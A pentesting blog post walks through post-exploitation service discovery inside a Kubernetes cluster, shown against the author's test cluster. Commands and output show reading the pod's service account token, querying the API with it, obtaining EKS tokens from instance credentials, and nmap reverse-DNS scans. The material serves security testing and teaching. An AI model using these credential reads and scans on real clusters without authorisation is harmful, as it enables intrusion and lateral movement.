Jekyll2023-12-14T03:05:08+00:00/feed.xmlThe Grey CornerStephen Bradshaw's blog about pentesting and computer security Stephen BradshawKubernetes Internal Service Discovery2023-12-13T08:20:00+00:002023-12-13T08:20:00+00:00/2023/12/13/kubernetes-internal-service-discovery<p>This blog post talks about methods you can use from within a compromised container to discover additional accessible network services within a Kubernetes cluster. The post assumes you have obtained code execution in the compromised container, and want to use that access to attack other internal services within the cluster.</p>
<p>Some approaches discussed will require access to particular tools inside the container. You may be able to just download and run these tools if you have Internet access and sufficient permissions in the container, however I will try and suggest alternate approaches if I know of them.</p>
<p>I will also describe a number of internal Kubernetes components that can be used to help you discover other services to attack, as well as how the discovery process can be complicated by service meshes like <a href="https://istio.io/">Istio</a>.</p>
<p><strong>Note</strong>: In a Kubernetes post exploitation scenario there are other potential attack vectors you can use such as container escapes and accessing other internal networks outside the cluster that will not be discussed in this post.</p>
<h1 id="pods-and-services">Pods and services</h1>
<p>The two main types of Kubernetes components you will be primarily interested in when looking to attack other network accessible applicatiions within the cluster are <a href="https://kubernetes.io/docs/concepts/workloads/pods/">pods</a> and <a href="https://kubernetes.io/docs/concepts/services-networking/service/">services</a>.</p>
<p>Pods are groups of one or more running containers, and this is where the internal networked applications you want to attack will be running. Pods have internal cluster IP addresses associated with them, and have one or more exposed network ports you can use to communicate with the networked applications.</p>
<p>Services are friendly ways of exposing applications running on one or more pods. These again have cluster IP addresses and one or more exposed ports, as well as various associated DNS records configured in the clusters DNS resolver. Accessing the application using a service vs accessing it directly at the pod are usually similar, however the services have additional discoverability features that can be useful to us.</p>
<p>The IP addresses used for pods will usually be in a seperate private network range from those of services.</p>
<p>Now that we have established what we are looking for, lets cover some of the methods we can use to identify these components.</p>
<h1 id="situational-awareness">Situational awareness</h1>
<p>To start, its useful to collect some specific information from the pod you have compromised that will help in the coming steps. The in-container examples I will be showing in this post are from the shell of a <a href="https://github.com/madhuakula/hacker-container">hacker-container</a> pod running in my test cluster, as a demonstration of having code execution in a container in the cluster.</p>
<p>In order to facilitate later discovery steps, we are looking for information such as cluster IP addresses and ports, the namespace of the pod, the API server address and any secrets or Kubernetes API authentication tokens.</p>
<p>First, check the environment variables. These often contain IP addresses and ports of other services in the cluster that can act as a starting point for discovery. Of particular interest are variables containing the string <code class="language-plaintext highlighter-rouge">KUBERNETES</code>, which point to the Kubernetes API service. See the below example from a pod within my test cluster.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# env | grep KUBERNETES
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_SERVICE_PORT=443
KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443
KUBERNETES_PORT_443_TCP_PROTO=tcp
KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1
KUBERNETES_SERVICE_HOST=10.96.0.1
KUBERNETES_PORT=tcp://10.96.0.1:443
KUBERNETES_PORT_443_TCP_PORT=443
</code></pre></div></div>
<p>Other good sources of cluster IP addresses are files <code class="language-plaintext highlighter-rouge">/etc/hosts</code> (giving your pod’s local IP address, which you can also obtain from the <code class="language-plaintext highlighter-rouge">ip</code> or <code class="language-plaintext highlighter-rouge">ifconfig</code> commands) and <code class="language-plaintext highlighter-rouge">/etc/resolv.conf</code> (giving the clusters DNS server address and the DNS search domains which infers the pod’s namespace).</p>
<p>Here are examples of those files, revealing my pod address <code class="language-plaintext highlighter-rouge">172.16.7.159</code>, the pod name <code class="language-plaintext highlighter-rouge">hacker-container</code>, the nameserver <code class="language-plaintext highlighter-rouge">10.96.0.10</code> and the namespace of my pod <code class="language-plaintext highlighter-rouge">default</code> (from search entry <code class="language-plaintext highlighter-rouge">default.svc.cluster.local</code>):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# cat /etc/hosts
# Kubernetes-managed hosts file.
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
fe00::0 ip6-mcastprefix
fe00::1 ip6-allnodes
fe00::2 ip6-allrouters
172.16.7.159 hacker-container
bash-5.1# cat /etc/resolv.conf
search default.svc.cluster.local svc.cluster.local cluster.local thezoo.local
nameserver 10.96.0.10
options ndots:5
</code></pre></div></div>
<p>You can also look at the claims in the pod’s service account token to gather information. This file provides the default credentials the pod will use to query the Kubernetes API server, and is located by default in local file <code class="language-plaintext highlighter-rouge">/run/secrets/kubernetes.io/serviceaccount/token</code>. You can decode the token’s second section to extract it’s claims. From this we can see fields which point to the API server, and tell you the pod name and the service account name and more.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# cat /run/secrets/kubernetes.io/serviceaccount/token | cut -d '.' -f 2 | base64 -d
{"aud":["https://kubernetes.default.svc.cluster.local"],"exp":1733371260,"iat":1701835260,"iss":"https://kubernetes.default.svc.cluster.local","kubernetes.io":{"namespace":"default","pod":{"name":"hacker-container","uid":"9beba93e-df52-4154-927c-3c30ba0f3bcf"},"serviceaccount":{"name":"default","uid":"c4dbaef1-e953-4585-990d-7c450908aa46"},"warnafter":1701838867},"nbf":1701835260,"sub":"system:serviceaccount:default:default"}
</code></pre></div></div>
<p>Also useful is <code class="language-plaintext highlighter-rouge">/run/secrets/kubernetes.io/serviceaccount/namespace</code>, which tells you the namespace in which your pod is running.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# cat /run/secrets/kubernetes.io/serviceaccount/namespace
default
</code></pre></div></div>
<p>Its also worthwhile to check the mounted filesystems in the container using the <code class="language-plaintext highlighter-rouge">mount</code> command, to confirm that your container doesn’t have any other accessible secrets that can be used to access the API server. The default service account secret mount is at <code class="language-plaintext highlighter-rouge">/run/secrets/kubernetes.io/serviceaccount</code>, any other mounted filesystems with <code class="language-plaintext highlighter-rouge">secret</code> or <code class="language-plaintext highlighter-rouge">serviceaccount</code> in the name are worth looking at. Additionally, all the normal local enumeration techniques also apply - e.g. look in application configuration files in the pod.</p>
<h1 id="the-kubernetes-api-server">The Kubernetes API server</h1>
<p>Your first port of call to get details about pods and services in a Kubernetes cluster is the Kubernetes API. This API is the primary means by which Kubernetes clusters are configured, managed and audited, and it is definitely the easiest way to get comprehensive information on pods and services in the cluster. You do have to be authorised to use it however.</p>
<p>The previous section mentions a few ways in which you can locate the API server, which is also usually accessible from within the cluster by a default service at <code class="language-plaintext highlighter-rouge">https://kubernetes.default.svc.cluster.local/</code>.</p>
<p>So its quite easy to find where the API server is, but getting useful information out of it will usually be another problem.</p>
<p>By default, in more recent Kubernetes varions at least, the in built Kubernetes service account represented by the token we showed in the previous section wont have any useful access to the Kubernetes API. You should still test the access this token gives you just in case additional rights have been added however - the next section will go into more detail on how this can be done.</p>
<p>As a simple example, in the case below, the service account token in this pod <strong>has</strong> been allocated extra rights, and it <strong>can</strong> list resources in its own (<code class="language-plaintext highlighter-rouge">default</code>) namespace…</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# kubectl --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" get pods -o wide
NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES
hacker-container 2/2 Running 3 (48d ago) 48d 172.16.7.159 kubecontainer.thezoo.local <none> <none>
haproxy-77766c8866-2hf44 2/2 Running 0 46d 172.16.7.182 kubecontainer.thezoo.local <none> <none>
ichnaea-5566dd5bd7-hxccb 2/2 Running 2 (48d ago) 48d 172.16.7.145 kubecontainer.thezoo.local <none> <none>
mitmproxy-7658d6f68d-d67bh 2/2 Running 0 46d 172.16.7.184 kubecontainer.thezoo.local <none> <none>
theia-d88b7b7b4-kd99k 2/2 Running 0 28d 172.16.7.130 kubecontainer.thezoo.local <none> <none>
</code></pre></div></div>
<p>The token <strong>cannot</strong> access resources cluster wide however:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# kubectl --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" get pods -o wide --all-namespaces
Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:default:default" cannot list resource "pods" in API group "" at the cluster scope
</code></pre></div></div>
<p>In a coming section, we will look at another way you might be able to get Kubernetes API access if you are inside an AWS EKS cluster, but first let’s look in some more detail at various ways in which you can use the API server to get useful information on pods and services.</p>
<h1 id="extracting-pod-and-service-information-from-the-kubernetes-api">Extracting pod and service information from the Kubernetes API</h1>
<p>The easiest way to query the Kubernetes API is use the kubectl command line tool. If the tool is not already on the container which you have compromised (and it probably won’t be), you can easily download it if your pod has outbound Internet access.</p>
<p>You can get the version of the Kubernetes API server unauthenticated at <code class="language-plaintext highlighter-rouge">https://kubernetes.default.svc.cluster.local/version</code>, and you can get the latest available version of Kubernetes from <a href="https://kubernetes.io/releases/">here</a> (at the time of writing it is <code class="language-plaintext highlighter-rouge">1.28.4</code>).</p>
<p>Once you know what version of the tool you want you can download the tool for the appropriate CPU architecture (<code class="language-plaintext highlighter-rouge">uname -a</code> in your container) from one of the following URLs. Just replace <code class="language-plaintext highlighter-rouge">[VERSION]</code> in the URL with the appropriate Kubernetes version:</p>
<ul>
<li><strong>ARM64</strong> <code class="language-plaintext highlighter-rouge">https://storage.googleapis.com/kubernetes-release/release/v[VERSION]/bin/linux/arm64/kubectl</code></li>
<li><strong>AMD64</strong> <code class="language-plaintext highlighter-rouge">https://storage.googleapis.com/kubernetes-release/release/v[VERSION]/bin/linux/amd64/kubectl</code></li>
</ul>
<p>Then, to get a list of all the running pods in the cluster, with IP addresses, you can run something like the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl get pods --all-namespaces -o wide
</code></pre></div></div>
<p>The above will just list out the IP addresses of the pods, if you want to get the exposed ports too, you will need to use a more verbose output format. There are various query options using jsonpath in the kubectl tool you can use to get individual fields details, but when I need multiple specific fields I usually just dump all output to JSON and parse it offline. A later section of this post will show an easy way to extract the required information from the JSON output. You can get all the pod details as JSON like so.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl get pods --all-namespaces -o json > /tmp/pod_details.json
</code></pre></div></div>
<p>Services are a little easier - the below will get both IP address and port details for all services in the cluster.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kubectl get svc --all-namespaces
</code></pre></div></div>
<p>You can also use the <code class="language-plaintext highlighter-rouge">-o json</code> and redirect to file to just a JSON dump here too if you like.</p>
<h2 id="kubectl-options">kubectl options</h2>
<p>The above examples of kubectl demonstrate the simplest way to use the tool, using the default options or those configured in <code class="language-plaintext highlighter-rouge">~/.kube/config</code>. If you want to try multiple authentication sources to see if there are differences in access, it’s helpful to know a few options that help you modify the way that kubectl operates.</p>
<p>The <code class="language-plaintext highlighter-rouge">--all-namespaces</code> (or <code class="language-plaintext highlighter-rouge">-A</code> for short) option might not work for you if you are not authorised to query details cluster wide (as in the service account example shown in the previous section). If that’s the case, you can try to query only specific namespaces using the <code class="language-plaintext highlighter-rouge">-n</code> option (the command <code class="language-plaintext highlighter-rouge">kubectl get ns</code> will list configured namespaces assuming you have permissions to do so).</p>
<p>See the example below, querying the <code class="language-plaintext highlighter-rouge">default</code> namespace. (The <code class="language-plaintext highlighter-rouge">default</code> namespace is the default namespace used by kubectl if you dont explicitly configure one as we have done below.)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# kubectl get pods -n default -o wide
NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES
hacker-container 2/2 Running 3 (48d ago) 49d 172.16.7.159 kubecontainer.thezoo.local <none> <none>
haproxy-77766c8866-2hf44 2/2 Running 0 46d 172.16.7.182 kubecontainer.thezoo.local <none> <none>
ichnaea-5566dd5bd7-hxccb 2/2 Running 2 (48d ago) 49d 172.16.7.145 kubecontainer.thezoo.local <none> <none>
mitmproxy-7658d6f68d-d67bh 2/2 Running 0 46d 172.16.7.184 kubecontainer.thezoo.local <none> <none>
theia-d88b7b7b4-kd99k 2/2 Running 0 29d 172.16.7.130 kubecontainer.thezoo.local <none> <none>
</code></pre></div></div>
<p>Kubernetes supports a number of ways in which you can authenticate to the API server. You can <a href="https://thegreycorner.com/2023/11/15/kubernetes-auth-deep-dive.html">check here</a> for a deep dive into this subject.</p>
<p>One of the more commonly supported authentication methods is via JWT tokens. In the command above, kubectl is using it’s default setting of authenticating using the pods service account token <code class="language-plaintext highlighter-rouge">/run/secrets/kubernetes.io/serviceaccount/token</code>.</p>
<p>If we want to specify a particular token to use, we can do this using the <code class="language-plaintext highlighter-rouge">--token</code> option, as shown below.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# kubectl --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" get pods -o wide
NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES
hacker-container 2/2 Running 3 (48d ago) 48d 172.16.7.159 kubecontainer.thezoo.local <none> <none>
haproxy-77766c8866-2hf44 2/2 Running 0 46d 172.16.7.182 kubecontainer.thezoo.local <none> <none>
ichnaea-5566dd5bd7-hxccb 2/2 Running 2 (48d ago) 48d 172.16.7.145 kubecontainer.thezoo.local <none> <none>
mitmproxy-7658d6f68d-d67bh 2/2 Running 0 46d 172.16.7.184 kubecontainer.thezoo.local <none> <none>
theia-d88b7b7b4-kd99k 2/2 Running 0 28d 172.16.7.130 kubecontainer.thezoo.local <none> <none>
</code></pre></div></div>
<h2 id="accessing-the-api-server-using-curl">Accessing the API server using curl</h2>
<p>If you dont dont want to use kubectl to query the API server, you can also do it using a generic HTTP client like curl. The following example shows how to perform such a query.</p>
<p>We add the authorisation token (using the <code class="language-plaintext highlighter-rouge">Authorization</code> header), specify the Certificate Authority CA file to verify the SSL connection (<code class="language-plaintext highlighter-rouge">--cacert</code>) and perform a namespaced query for pods in the <code class="language-plaintext highlighter-rouge">default</code> namespace (using path <code class="language-plaintext highlighter-rouge">/api/v1/namespaces/default/pods</code>).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# curl -H "Authorization: Bearer $(cat /run/secrets/kubernetes.io/serviceaccount/token)" --cacert /run/secrets/kubernetes.io/serviceaccount/ca.crt https://kubernetes.default.svc.cluster.local/api/v1/namespaces/default/pods
[SNIP]
</code></pre></div></div>
<p>The output will be a JSON dump of all the data, similar to what would be returned by the <code class="language-plaintext highlighter-rouge">-o json</code> in kubectl. Ive removed this in the above output in the interests of space. It’s very detailed, so you will probably want to redirect it to disk for parsing. If you wanted namespaced service information instead you would replace <code class="language-plaintext highlighter-rouge">pods</code> in the above with <code class="language-plaintext highlighter-rouge">services</code>.</p>
<p>The following URI paths can be used to perform cluster-wide queries for pods and services respectively, assuming you have the required permissions:</p>
<ul>
<li>/api/v1/pods</li>
<li>/api/v1/services</li>
</ul>
<p>I would suggest testing both non-namespaced and namespaced queries for both pods and services using each API authentication method you have available to you before giving up on the API, because it’s the most authorative and easiest way to get the information you want. For namedspaced queries, start with the namespace your pod is in and if that works try each of the others. If you can’t get the namespace list from the API (at path <code class="language-plaintext highlighter-rouge">/api/v1/namespaces</code>) read the section later on Kubernetes DNS for some ideas on how to enumerate namespaces.</p>
<h2 id="parsing-the-kubernetes-api-json-output-for-useful-info">Parsing the Kubernetes API JSON output for useful info</h2>
<p>Once I have API output for pods and services in JSON format I like to parse out the useful information using iPython. See <a href="https://thegreycorner.com/2023/08/16/iPython-for-cyber-security.html">here</a> for a good overview on how I use iPython for security related processing. Below are some quick snippets on how to quickly extract the useful information from JSON output for pods or services from the API (either from kubectl or via a HTTP client like curl).</p>
<p>Import the JSON module</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import json
</code></pre></div></div>
<p>Show the IP and ports for the first container in each pod.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pods = json.load(open('/tmp/pods.json'))
{a['metadata']['name'] : [[b['containerPort'] for b in a['spec']['containers'][0]['ports']], a['status']['podIP']] for a in pods['items'] if 'ports' in a['spec']['containers'][0]}
</code></pre></div></div>
<p>Show the IP and ports for each service.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>services = json.load(open('/tmp/services.json'))
{a['metadata']['name']: [a['spec']['clusterIPs'], [b['port'] for b in a['spec']['ports']]] for a in services['items']}
</code></pre></div></div>
<h1 id="authentication-to-the-kubernetes-api-using-instance-credentials-in-an-aws-eks-kubernetes-cluster">Authentication to the Kubernetes API using instance credentials in an AWS EKS Kubernetes cluster</h1>
<p>If the cluster you are attacking is an AWS EKS Kubernetes cluster, there is another option potentially available to you to authenticate to the Kubernetes API. It involves using the AWS credentials from the internal AWS metadata service to authenticate to the AWS API and obtain the related Kubernetes token. This method does require that you know the EKS clusters name, which you might have to guess.</p>
<p>The first thing you can try is to get the cluster name by listing known EKS clusters like so.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws eks list-clusters
</code></pre></div></div>
<p>If this gives you the cluster name, great! If not, you might be able to guess it, inferring from other values you find elsewhere in the cluster. The caller identity (<code class="language-plaintext highlighter-rouge">aws sts get-caller-identity</code>) of the instance’s credential might contain the cluster name within its role name. You might also be able to come back to this step armed with new information after exploring other services in the cluster found using some of the other methods in this post. Metrics and monitoring services and key value stores like redis can be good sources of information for this.</p>
<p>You can test to see if you have correctly guessed the EKS cluster name by using it in a command like the following.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws eks describe-cluster --name [CLUSTER_NAME]
</code></pre></div></div>
<p>Once you have the correct cluster name, you can get a token you can use for API server authentication like so.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws eks get-token --cluster-name [CLUSTER_NAME]
</code></pre></div></div>
<p>Alternatively, if you want to use the kubectl tool, you can write a config file (<code class="language-plaintext highlighter-rouge">~/.kube/config</code>) to automatically configure this to use a token as generated by the previous command like so. Once this is done, you can just run kubectl as normal.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws eks update-kubeconfig --name [CLUSTER_NAME]
</code></pre></div></div>
<p>Once you have a EKS token, try it against the API as discussed in the previous section - it may have more access than the pod’s service account token.</p>
<h1 id="traditional-host-and-port-discovery">Traditional host and port discovery</h1>
<p>If you can’t use the Kubernetes API, which will give you a complete list of pods, service addresses and ports, the next approach is to use more traditional discovery techniques, which we can target specifically for the peculiarities of Kubernetes.</p>
<p>Start with the IP addresses obtained as discussed in the Situational Awareness section above. We will use these known addresses to infer what the network ranges for pods and services might be.</p>
<p>The “services” range will be the one in which your Kubernetes API server (<code class="language-plaintext highlighter-rouge">10.96.0.1</code> in my example) and Kubernetes DNS server (<code class="language-plaintext highlighter-rouge">10.96.0.10</code>) reside.</p>
<p>Then there is the “pod” range, in which my pod ip (<code class="language-plaintext highlighter-rouge">172.16.7.159</code>) sits.</p>
<p>You might have found more IP addresses in your target cluster (in environment variables, local files, etc), take these into account too.</p>
<h2 id="possible-range-of-ips">Possible range of IPs</h2>
<p>Given the IP addresses collected above in my example, the possible range of IP addresses that <strong>could</strong> potentially be in use is as follows, based on the IANA privat network range definitions:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>10.0.0.0 to 10.255.255.255 (16777216 hosts)
172.16.0.0 to 172.31.255.255 (1048576 hosts)
</code></pre></div></div>
<p>This is obviously a large number of addresses to scan, even for a local scan. The approach I usually like to take when discovering services across such a large network range is a two step one of first identifing live hosts and then trying to identify listening services on those hosts.</p>
<p>Let’s look at some other potential complicating factors as well as exploring a Kubernetes feature that can help us identify hosts and services.</p>
<h2 id="checking-environment-behaviour">Checking environment behaviour</h2>
<p>Before we take any further steps to try and discover hosts on nearby addresses, we need to see how these systems respond when we try and probe them.</p>
<p>If we ping the two external known IPs in the service range, we will see they dont respond to ICMP echo requests.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# ping 10.96.0.1
PING 10.96.0.1 (10.96.0.1) 56(84) bytes of data.
^C
--- 10.96.0.1 ping statistics ---
2 packets transmitted, 0 received, 100% packet loss, time 1025ms
bash-5.1# ping 10.96.0.10
PING 10.96.0.10 (10.96.0.10) 56(84) bytes of data.
^C
--- 10.96.0.10 ping statistics ---
3 packets transmitted, 0 received, 100% packet loss, time 2030ms
</code></pre></div></div>
<p>This makes host discovery more challenging - we can’t just ping to reliably determine if an IP is assigned in the cluster. Machines not responding to pings is obviously a common issue with host discovery and network scanning, but it’s good to confirm that we need to deal with it here too.</p>
<h2 id="service-mesh-complications">Service mesh complications</h2>
<p>Certain service meshes like <a href="https://istio.io/">Istio</a> work by intercepting traffic to certain pods and services in order to provide more featureful traffic routing. In this case components of the mesh will complete the TCP three way handshake for all valid ports and all valid IP addresses within its configured ranges, before then forwarding the connection in the backend only if there is a configured service mesh route to a pod or service. This can have the effect of TCP ports appearing to be open even when there is nothing actually listening at the associated IP address and/or port. Port scanners that use the TCP handshake to determine if a host is live or a port is open will give you wildly inaccurate results when this occurs. In these cases you are left to rely on application level responses coming back before you can tell if supposedly listening TCP servers actually have something behind them.</p>
<p>The range of IP addresses within a cluster that this behaviour applies to can vary based on configuration, but you can tell its happening for a given IP address if every single applicable TCP port you try on the host shows open. Consequently, if you know the cluster you are looking at uses Istio or another similar service mesh, you need to account for this when doing internal service discovery. If this is not the case you obviously have the option to use more traditional TCP port scanning approaches to identify live hosts and ports.</p>
<h2 id="kubernetes-dns-to-the-partial-rescue">Kubernetes DNS to the (partial) rescue</h2>
<p>We actually have access to a Kubernetes specific way to identify live services and sometimes pods in the form of the Kubernetes DNS service.</p>
<p>This service automatically creates various DNS records for both pods and services in the cluster as discussed in the official documentation <a href="https://kubernetes.io/docs/concepts/services-networking/dns-pod-service/">here</a>.</p>
<p>There are two types of records for pods</p>
<ul>
<li>Forward (e.g. A) records for the pod IP in the format <code class="language-plaintext highlighter-rouge"><pod-ip>.<namespace>.pod.cluster.local</code> (where dots <code class="language-plaintext highlighter-rouge">.</code> in the IP address are replaced with dashes <code class="language-plaintext highlighter-rouge">-</code>), and</li>
<li>Forward (A) and reverse (PTR) records for any pod exposed by a service at <code class="language-plaintext highlighter-rouge"><pod-ip>.<service-name>.<namespace>.svc.cluster.local</code>.</li>
</ul>
<p>And for services there are:</p>
<ul>
<li>Forward (A) and reverse (PTR) records for each service in the form <code class="language-plaintext highlighter-rouge"><service-name>.<namespace>.svc.cluster.local</code>, and</li>
<li>Service (SRV) records for each listening port of the service in the form <code class="language-plaintext highlighter-rouge">_<port-name>._<port-protocol><service-name>.<namespace>.svc.cluster.local</code>.</li>
</ul>
<p>Unfortunately, the first pod record type is useless for host discovery purposes as there are no reverse entries and forward lookups for any valid IPv4 address in any valid namespace will work, regardless if it is assigned to a pod in the cluster.</p>
<p>For example, using this pod address pattern to check the IP address <code class="language-plaintext highlighter-rouge">127.0.0.1</code> in the <code class="language-plaintext highlighter-rouge">default</code> namespace works fine.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# dig +short 127-0-0-1.default.pod.cluster.local
127.0.0.1
</code></pre></div></div>
<p>The only useful enumeration purpose we can achieve with these records is brute forcing valid namespaces - the <code class="language-plaintext highlighter-rouge">default</code> namespace in the above can be replaced with any other namespace in the system and a result will be returned, as long as the namespace exists in the cluster.</p>
<p>The reverse (PTR) records however are much more useful.</p>
<p>If we do reverse DNS lookups on our known IPs, we can see that the service IPs both have inverse lookup entries, but the pod IP does not.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# dig +short -x 10.96.0.10
kube-dns.kube-system.svc.cluster.local.
bash-5.1# dig +short -x 10.96.0.1
kubernetes.default.svc.cluster.local.
bash-5.1# dig +short -x 172.16.7.159
bash-5.1#
</code></pre></div></div>
<p>This lines up with the documentation - the services both have reverse DNS entries, but the pod (which in this case is not associated with a service) does not. This gives us a way in which we can identify cluster IP addresses associated with services, as well as pod IP addresses that are backed by services, by doing reverse DNS lookups across applicable network ranges. This will identify all IPs associated with services and most of the ones associated with pods, and will help in narrowing the potential IP ranges in use for each. We will look an example of this in the next section.</p>
<p>The other record type mentioned above was SRV records. Taking the most obvious example of the default kubernetes API service, we can get the associated SRV record for the https port like so:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# dig +short SRV _https._tcp.kubernetes.default.svc.cluster.local
0 100 443 kubernetes.default.svc.cluster.local.
bash-5.1# dig +short _https._tcp.kubernetes.default.svc.cluster.local
10.96.0.1
</code></pre></div></div>
<p>This tells us the TCP port that the service listens on - 443, as well as a priority (0) and weight (100) for this particular endpoint. We can also see above that if we request the A record for that name we get the expected service IP address that should exist for all DNS SRV records.</p>
<p>This does give us a way to identify all listening ports associated with a service once we know its DNS name, however the port names come from potentially arbitrary values provided in the service definition and not all of them are as obvious as <code class="language-plaintext highlighter-rouge">https</code>.</p>
<p>To demonstrate this, I will use the Kubernetes API from my Kubernetes host system to perform a describe operation on the <code class="language-plaintext highlighter-rouge">jaeger-collector</code> service that comes with Istio (and runs in the <code class="language-plaintext highlighter-rouge">istio-system</code> namespace), so we can see what some of the service port names are:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>stephen@kubecontainer:~$ kubectl describe service jaeger-collector -n istio-system
Name: jaeger-collector
Namespace: istio-system
Labels: app=jaeger
Annotations: <none>
Selector: app=jaeger
Type: ClusterIP
IP Family Policy: SingleStack
IP Families: IPv4
IP: 10.97.213.168
IPs: 10.97.213.168
Port: jaeger-collector-http 14268/TCP
TargetPort: 14268/TCP
Endpoints: 172.16.7.142:14268
Port: jaeger-collector-grpc 14250/TCP
TargetPort: 14250/TCP
Endpoints: 172.16.7.142:14250
Port: http-zipkin 9411/TCP
TargetPort: 9411/TCP
Endpoints: 172.16.7.142:9411
Port: grpc-otel 4317/TCP
TargetPort: 4317/TCP
Endpoints: 172.16.7.142:4317
Port: http-otel 4318/TCP
TargetPort: 4318/TCP
Endpoints: 172.16.7.142:4318
Session Affinity: None
Events: <none>
</code></pre></div></div>
<p>If we wanted to get the SRV record for the <code class="language-plaintext highlighter-rouge">grpc-otel</code> service port listening on port 4317 mentioned in the output above, we would need to do a request like the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# dig +short SRV _grpc-otel._tcp.jaeger-collector.istio-system.svc.cluster.local
0 100 4317 jaeger-collector.istio-system.svc.cluster.local.
</code></pre></div></div>
<p>So, while we can easily brute force service PTR/A records by reverse resolving across a range of IPs, to get service records we would need to start with the service A record names and then try various values for the first part of the SRV record. Based on the example above we know that the possible values for this are not included within common service name information sources like <code class="language-plaintext highlighter-rouge">/etc/services</code> or even the nmap services file, and you may have to rely on additional information to find correct values. For some standardised Kubernetes applications, the service name and namespace may help you narrow down possible service port names via the use of related documentation or source code to build a list for brute forcing.</p>
<h2 id="reverse-dns-scanning-to-identify-live-systems">Reverse DNS scanning to identify live systems</h2>
<p>Lets look at a practical example of using the Kubernetes reverse DNS entries to identify live IPS. In our example cluster we have known service IPs of <code class="language-plaintext highlighter-rouge">10.96.0.10</code> and <code class="language-plaintext highlighter-rouge">10.96.0.1</code> which sit inside the IANA assigned private range <code class="language-plaintext highlighter-rouge">10.0.0.0/8</code>. This is a huge number of addresses to scan, so as an initial compromise we can reduce this to a more managable initial range of <code class="language-plaintext highlighter-rouge">10.96.0.0/16</code> to demonstrate the concept. A nice way to perform a reverse DNS scan of the hosts in this range is to run nmap as follows and write the output to disk in greppable form.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# nmap -oG dns_scan_svc_1 -sn -Pn -R 10.96.0.0/16
[SNIP]
</code></pre></div></div>
<p>Once the scan is done, look at the entries in the file to identify the pattern you need to filter for. This is a local cluster, so in this case the only DNS entries that exist are those created by Kubernetes so we are looking to ignore entries without a reverse name. In a cloud environment like AWS however unallocated IPs in the cluster will likely have AWS created reverse entries probably ending with something like <code class="language-plaintext highlighter-rouge">compute.internal</code>, so you will want to ignore those instead.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# head dns_scan_svc_1
# Nmap 7.91 scan initiated Wed Dec 6 07:58:28 2023 as: nmap -oG dns_scan_svc_1 -sn -Pn -R 10.96.0.0/16
Host: 10.96.0.0 () Status: Up
Host: 10.96.0.1 (kubernetes.default.svc.cluster.local) Status: Up
Host: 10.96.0.2 () Status: Up
Host: 10.96.0.3 () Status: Up
Host: 10.96.0.4 () Status: Up
Host: 10.96.0.5 () Status: Up
Host: 10.96.0.6 () Status: Up
Host: 10.96.0.7 () Status: Up
Host: 10.96.0.8 () Status: Up
</code></pre></div></div>
<p>Based on this, we want to look for entries containing the word <code class="language-plaintext highlighter-rouge">Host</code>, but excluding those that contain no reverse name (so excluding lines containing <code class="language-plaintext highlighter-rouge">()</code>). We can do this like follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash-5.1# grep 'Host' dns_scan_svc_1 | grep -v '()'
Host: 10.96.0.1 (kubernetes.default.svc.cluster.local) Status: Up
Host: 10.96.0.10 (kube-dns.kube-system.svc.cluster.local) Status: Up
Host: 10.96.5.10 (my-nginx-svc1.argotest.svc.cluster.local) Status: Up
Host: 10.96.114.235 (argocd-notifications-controller-metrics.argocd.svc.cluster.local) Status: Up
Host: 10.96.148.230 (argocd-redis.argocd.svc.cluster.local) Status: Up
</code></pre></div></div>
